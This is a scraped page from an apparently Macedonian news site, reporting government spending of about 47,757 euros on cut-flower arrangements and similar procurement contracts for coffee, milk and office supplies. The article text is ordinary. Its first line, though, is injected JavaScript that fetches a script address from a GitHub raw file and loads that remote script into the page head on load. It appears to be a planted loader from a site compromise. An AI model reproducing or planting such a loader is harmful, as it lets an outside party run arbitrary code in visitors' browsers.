;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Владата потрошила 47 илјади евра за цвеќе - Антропол
АктуелноЛокално

Владата потрошила 47 илјади евра за цвеќе

Скандалозните договори за јавни набавки во режија на Службата за општи и заеднички работи на Владата на Република Македонија продолжуваат и понатамау. Последен во низата склучени договори е оној за аранжмани од режано цвеќе, договор чија вредност изнесува 47.757 евра, односно од 2.937.044 денари во денарска противвредност.

Овој договор е склучен на 4 февруари годинава, а Пеце Мирчески, како директор на Службата, е потписник на договорот со фирмата Триста-Груп ДООЕЛ Скопје. 

Ова не е прв пат со оваа компанија Владата да склучува договор за аранжмани од режано цвеќе. Претходни, Службата за општи и заеднички работи имала вакви договор. Во 2020 година вредноста на договорот „за цвеќиња“ изнесувал 47.889 евра, додека пак во 2019 година биле склучени два договори. Првиот на 28 мај чија вредност изнесувала 46.900 евра,  а вториот на 17 јуни за одржување и уредување на зелени површини во Владата и други резиденцијални објекти, во висина од 12.717 евра (или 783.061 денар).

Овој договор за јавна набавка е само еден во низата скандалозни во кои како нарачател се јавува Службата за општи и заеднички работи на Владата. Претходно годинава, за канцеларски материјали склучени се два договори во вкупна вредност од близу 100 илјади евра. Кон крајот на минатата година, за кафе склучен е договор од 47.967 евра, а за млеко и млечни производи нешто над 25 илјади евра.